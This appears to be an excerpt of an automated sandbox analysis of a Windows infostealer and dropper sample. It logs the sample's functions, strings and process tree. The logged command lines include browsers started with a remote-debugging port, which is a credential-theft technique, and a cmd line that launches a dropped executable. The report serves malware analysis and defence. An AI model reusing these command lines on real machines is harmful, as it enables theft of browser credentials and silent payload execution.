Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_004A7049 22_2_004A7049
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_004A8860 22_2_004A8860
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_004A78BB 22_2_004A78BB
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_004A31A8 22_2_004A31A8
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_00577B6E 22_2_00577B6E
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_00464B30 22_2_00464B30
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_004A2D10 22_2_004A2D10
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_00464DE0 22_2_00464DE0
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_00497F36 22_2_00497F36
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: 22_2_004A779B 22_2_004A779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00087049 23_2_00087049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00088860 23_2_00088860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_000878BB 23_2_000878BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_000831A8 23_2_000831A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00044B30 23_2_00044B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00082D10 23_2_00082D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00044DE0 23_2_00044DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00077F36 23_2_00077F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0008779B 23_2_0008779B
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_00CE369D 26_3_00CE369D
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Code function: 26_3_056FFD0B 26_3_056FFD0B
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 000580C0 appears 130 times
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Code function: String function: 004780C0 appears 130 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CD009D0 appears 246 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB0CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CD0D930 appears 43 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CBA3620 appears 61 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CB194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CD0DAE0 appears 52 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6CBA9B10 appears 68 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2523340768.000000006CD55000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2518810297.00000000232D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.2523052173.000000006CB62000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: kntikdlf ZLIB complexity 0.9949646816213795
Source: random[1].exe.24.dr Static PE information: Section: kntikdlf ZLIB complexity 0.9949646816213795
Source: 3daf81f16e.exe.24.dr Static PE information: Section: kntikdlf ZLIB complexity 0.9949646816213795
Source: 28d9ab8742.exe.24.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@92/147@66/33
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB37030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6CB37030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\UIXF32GP.htm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9056:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\a2a3ea38-8f29-40d7-b1c4-c472672fc2c0.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2523239929.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2358535902.000000001D1C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272048623.000000001D1A5000.00000004.00000020.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2837802911.0000000005715000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2838319849.00000000056F7000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848650807.000000000570A000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001A.00000003.2848285184.0000000005716000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965741685.0000000005E9B000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2979008171.0000000005EB4000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2965202155.0000000005EBA000.00000004.00000800.00020000.00000000.sdmp, 28d9ab8742.exe, 0000001F.00000003.2966029681.0000000005E89000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2522726783.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2515671828.000000001D2A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 28d9ab8742.exe String found in binary or memory: "app.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signatur
Source: 28d9ab8742.exe String found in binary or memory: p.update.lastUpdateTime.recipe-client-addon-run", 1696486832); user_pref("app.update.lastUpdateTime.region-update-timer", 0); user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836); user_pref("app.update.lastUpdateTime.xpi-signature-v
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=1884,i,13590626300903968152,15304544705898681332,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2280,i,8263969002267575968,18168452341544240962,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2764 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5352 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6968 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7404 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7404 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECBGHCGCBK.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECBGHCGCBK.exe "C:\Users\user\DocumentsECBGHCGCBK.exe"
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe "C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe "C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4128 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7000 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe "C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe "C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe "C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe "C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe "C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe "C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe "C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6568 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECBGHCGCBK.exe" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=1884,i,13590626300903968152,15304544705898681332,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2412 --field-trial-handle=2280,i,8263969002267575968,18168452341544240962,262144 /prefetch:3 Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2764 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe "C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5352 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6968 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7404 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7404 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=4128 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7000 --field-trial-handle=1952,i,7432511471498911834,11913331449728836615,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECBGHCGCBK.exe "C:\Users\user\DocumentsECBGHCGCBK.exe"
